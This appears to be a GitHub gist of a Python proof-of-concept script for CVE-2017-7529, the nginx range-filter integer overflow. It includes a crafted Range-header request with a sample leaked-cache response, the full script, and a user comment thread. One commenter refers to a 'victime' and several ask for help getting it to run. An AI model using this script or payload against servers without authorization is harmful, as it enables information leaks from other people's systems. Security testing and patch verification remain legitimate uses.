Nginx - Remote Integer Overflow Vulnerability

README.md

CVE 2017-7529

Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.

Make sure requests is installed

Usage

usage: python CVE_2017_7529.py [-h] url

Nginx - Remote Integer Overflow Vulnerability - CVE 2017-7529

positional arguments:
  url         URL to test

optional arguments:
  -h, --help  show this help message and exit

Requests

GET /proxy/demo.png HTTP/1.1
Accept-Encoding: identity
Range: bytes=-17208,-9223372036854758792
Host: 127.0.0.1:8000
Connection: close
User-Agent: Python-urllib/2.7

HTTP/1.1 206 Partial Content
Server: nginx/1.13.1
Date: Mon, 14 Aug 2017 05:53:54 GMT
Content-Type: multipart/byteranges; boundary=00000000000000000002
Connection: close
Last-Modified: Mon, 17 Jul 2017 02:19:08 GMT
ETag: "40c9-5547a060fdf00"
X-Proxy-Cache: HIT


--00000000000000000002
Content-Type: image/png
Content-Range: bytes -623-16584/16585

.......<.Y......................lY....r:.Y.....@.`..v.q.."40c9-5547a060fdf00".................................................................................................................................................................................................................................................................
KEY: httpGET127.0.0.1/proxy/demo.png
HTTP/1.1 200 OK
Date: Mon, 14 Aug 2017 05:51:46 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Mon, 17 Jul 2017 02:19:08 GMT
ETag: "40c9-5547a060fdf00"
Accept-Ranges: bytes
Content-Length: 16585
Connection: close
Content-Type: image/png

CVE_2017_7529.py

#!/usr/bin/env python
# -*- coding:utf-8 -*-

# Nginx - Remote Integer Overflow Vulnerability
# CVE-2017-7529

import sys
import logging
import argparse


try:
    import requests
    from requests.packages.urllib3.exceptions import InsecureRequestWarning

    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
except ImportError:
    print("Please install the requests module.")
    sys.exit(1)


logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__name__)


def send_request(url, headers=None, timeout=8):
    kwargs = {"headers": headers, "timeout": timeout, "verify": False}
    response = requests.get(url, **kwargs)
    http_headers = response.headers

    log.info("status: %s" % response.status_code)
    log.info("server: %s" % http_headers.get("Server", ""))
    return response


def exploit(url):
    log.info("target: %s", url)
    response = send_request(url)

    content_length = response.headers.get("Content-Length", 0)
    bytes_length = int(content_length) + 623
    content_length = "bytes=-%d,-9223372036854%d" % (
        bytes_length,
        776000 - bytes_length,
    )

    response = send_request(url, headers={"Range": content_length})
    if response.status_code == 206 and "Content-Range" in response.headers:
        log.info("vulnerable?: Vulnerable to CVE-2017-7529")
    elif response.status_code == 416:
        log.warn("vulnerable?: Not Vulnerable (Range Not Satisfiable)")
    else:
        log.info("vulnerable?: Unknown (%s)" % response.status_code)


if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description="Nginx - Remote Integer Overflow Vulnerability - CVE 2017-7529"
    )
    parser.add_argument("url", help="URL to test", type=str)
    args = parser.parse_args()

    url = requests.utils.urlparse(args.url)

    if not url.scheme:
        print(
            "URL scheme specifier is missing. Please include either 'http://' or 'https://'."
        )
        sys.exit(1)

    if not url.path:
        print("URL path is missing. Please include a full path.")
        sys.exit(1)

    exploit(args.url)

python CVE_2017_7529.py https://example.com/robots.txt
INFO:main:target: https://example.com/robots.txt
INFO:requests.packages.urllib3.connectionpool:Starting new HTTPS connection (1): example.com
INFO:main:status: 200
INFO:main:server: nginx/1.12.2
INFO:requests.packages.urllib3.connectionpool:Starting new HTTPS connection (1): example.com
INFO:main:status: 200
INFO:main:server: nginx/1.12.2
INFO:main:vulnerable: Unknown (200)

now what to do my victime has only robots.txt dir with 200 okay response

Supposing target is abc.example.com

I am getting error while running this command

python CVE_2017_7529.py abc.example.com

Result

INFO:__main__:target: abc.example.com
Traceback (most recent call last):
  File "CVE_2017_7529.py", line 49, in <module>
    exploit(args.url)
  File "CVE_2017_7529.py", line 27, in exploit
    http_response = send_http_request(url)
  File "CVE_2017_7529.py", line 17, in send_http_request
    http_response = requests.get(url, headers=headers, timeout=timeout)
  File "/usr/local/lib/python3.7/site-packages/requests/api.py", line 75, in get
    return request('get', url, params=params, **kwargs)
  File "/usr/local/lib/python3.7/site-packages/requests/api.py", line 60, in request
    return session.request(method=method, url=url, **kwargs)
  File "/usr/local/lib/python3.7/site-packages/requests/sessions.py", line 519, in request
    prep = self.prepare_request(req)
  File "/usr/local/lib/python3.7/site-packages/requests/sessions.py", line 462, in prepare_request
    hooks=merge_hooks(request.hooks, self.hooks),
  File "/usr/local/lib/python3.7/site-packages/requests/models.py", line 313, in prepare
    self.prepare_url(url, params)
  File "/usr/local/lib/python3.7/site-packages/requests/models.py", line 387, in prepare_url
    raise MissingSchema(error)
requests.exceptions.MissingSchema: Invalid URL 

Requests already installed in mac mojave os...
I have also checked with both python and python3 ...getting same error.. plz let me know about how i can get rid of that error.

Thanks..

You are supposed to use a protocol, either https:// or http://

how to fix ssl error

Traceback (most recent call last):
File "CVE_2017_7529.py", line 49, in
exploit(args.url)
File "CVE_2017_7529.py", line 27, in exploit
http_response = send_http_request(url)
File "CVE_2017_7529.py", line 17, in send_http_request
http_response = requests.get(url, headers=headers, timeout=timeout)
File "/usr/local/lib/python3.6/dist-packages/requests/api.py", line 76, in get
return request('get', url, params=params, **kwargs)
File "/usr/local/lib/python3.6/dist-packages/requests/api.py", line 61, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/local/lib/python3.6/dist-packages/requests/sessions.py", line 530, in request
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python3.6/dist-packages/requests/sessions.py", line 665, in send
history = [resp for resp in gen]
File "/usr/local/lib/python3.6/dist-packages/requests/sessions.py", line 665, in
history = [resp for resp in gen]
File "/usr/local/lib/python3.6/dist-packages/requests/sessions.py", line 245, in resolve_redirects
**adapter_kwargs
File "/usr/local/lib/python3.6/dist-packages/requests/sessions.py", line 643, in send
r = adapter.send(request, **kwargs)
File "/usr/local/lib/python3.6/dist-packages/requests/adapters.py", line 514, in send
raise SSLError(e, request=request)
requests.exceptions.SSLError: HTTPSConnectionPool(host='example.com', port=443): Max retries exceeded with url: / (Caused by SSLError(SSLError(1, '[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:852)'),))

@im403 I just pushed an update to disable SSL verification.

i think this would do https://stackoverflow.com/a/63750034

but im not that good at python

tested on both py2 & py3 the same error

Traceback (most recent call last):
File "CVE_2017_7529.py", line 75, in
exploit(args.url)
File "CVE_2017_7529.py", line 47, in exploit
response = send_request(url, headers={"Range": content_length})
File "CVE_2017_7529.py", line 28, in send_request
response = requests.get(url, **kwargs)
File "/home/devgen/.local/lib/python2.7/site-packages/requests/api.py", line 76, in get
return request('get', url, params=params, **kwargs)
File "/home/devgen/.local/lib/python2.7/site-packages/requests/api.py", line 61, in request
return session.request(method=method, url=url, **kwargs)
File "/home/devgen/.local/lib/python2.7/site-packages/requests/sessions.py", line 542, in request
resp = self.send(prep, **send_kwargs)
File "/home/devgen/.local/lib/python2.7/site-packages/requests/sessions.py", line 697, in send
r.content
File "/home/devgen/.local/lib/python2.7/site-packages/requests/models.py", line 831, in content
self.content = b''.join(self.iter_content(CONTENT_CHUNK_SIZE)) or b''
File "/home/devgen/.local/lib/python2.7/site-packages/requests/models.py", line 758, in generate
raise ContentDecodingError(e)
requests.exceptions.ContentDecodingError: ('Received response with content-encoding: gzip, but failed to decode it.', error('Error -3 while decompressing: incorrect header check',))

Worked fine for me! Thanks!

Folks! If you are using this script and getitng an error but can't look at the code and figure it out, please, start doing somethign else!
To author: thank you very much!

I got vulnerable on my website using this code, then what should I do for next? and what's proof that's vulnerable? cause I just got status vulnerable not a sensitive data or others

@dimas354313 to protect yourself use these remediation steps: https://mailman.nginx.org/pipermail/nginx-announce/2017/000200.html

@thehappydinoa oke thanks a lot for your response